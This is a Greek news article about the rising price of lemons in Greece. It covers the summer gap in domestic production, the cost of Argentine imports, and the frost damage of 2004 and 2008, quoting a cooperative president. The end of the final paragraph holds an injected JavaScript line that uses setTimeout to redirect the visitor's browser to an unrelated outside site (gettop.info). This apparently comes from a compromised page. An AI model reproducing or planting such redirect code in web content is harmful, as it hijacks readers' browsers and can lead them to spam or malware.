Λεμόνια από… «χρυσάφι» πληρώνουν οι Έλληνες!

0
10
Πρόκειται για ένα σπάνιο φαινόμενο Λεμονιά να κάνει τόσο μεγάλα λεμόνια και μάλιστα σε μέγεθος πεπονιού. Πράγματι η λεμονιά του κ. Δημόπουλου Κωνσταντίνου που βρίσκεται στο σπίτι του στο Ναύπλιο παράγει μεγάλα λεμόνια κι όπως μας είπε χαρακτηριστικά ,χωρίς φάρμακα και λίπασμα. Πάντως είναι αξιόλογο φαινόμενο κι όλη η γειτονιά του ζητά λεμόνια μιας και με ένα τέτοιο λεμόνι γεμίζεις μία ολόκληρη κούπα , Τρίτη 20 Μαρτίου 2012. ΑΠΕ-ΜΠΕ /ΑΠΕ-ΜΠΕ/ΜΠΟΥΓΙΩΤΗΣ ΕΥΑΓΓΕΛΟΣ

 

Σε είδος πολυτελείας φαίνεται ότι έχουν μετατραπεί τα τελευταία χρόνια τα λεμόνια.

Ιδίως κατά τους θερινούς μήνες και έως τον Οκτώβριο, οπότε δεν υπάρχει ελληνική παραγωγή, οι τιμές αυξάνονται σημαντικά, καθώς τα εισαγόμενα Αργεντινής κοστίζουν ως και 3,30 ευρώ/κιλό.

«Από τα μέσα Ιουνίου μέχρι και τον Οκτώβριο δεν υπάρχει ελληνική παραγωγή λεμονιού«, επισήμανε μιλώντας στο ΑΠΕ-ΜΠΕ ο πρόεδρος της Παναιγιάλειου Ένωσης Συνεταιρισμών, Θανάσης Σωτηρόπουλος και εξήγησε ότι η παραγωγή λεμονιού στην Ελλάδα είναι σημαντικά μειωμένη συγκριτικά με το 2004, οπότε και «γκρεμίστηκε το μαγαζί» λόγω παγετού.

Παρότι στη συνέχεια έγιναν κάποιες προσπάθειες, ώστε η καλλιέργεια είχε μπει εκ νέου σε τροχιά ανάπτυξης, η θετική της πορεία ανεκόπη και πάλι το 2008, λόγω παγετού επίσης.

Για να αλλάξει η κατάσταση, «θα πρέπει οι παραγωγοί λεμονιού να τυγχάνουν γενναίας στήριξης από την πολιτεία και αυτό δεν συνάδει αποκλειστικά και μόνο σε οικονομική βοήθεια«, υπογράμμισε ο κ. Σωτηρόπουλος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here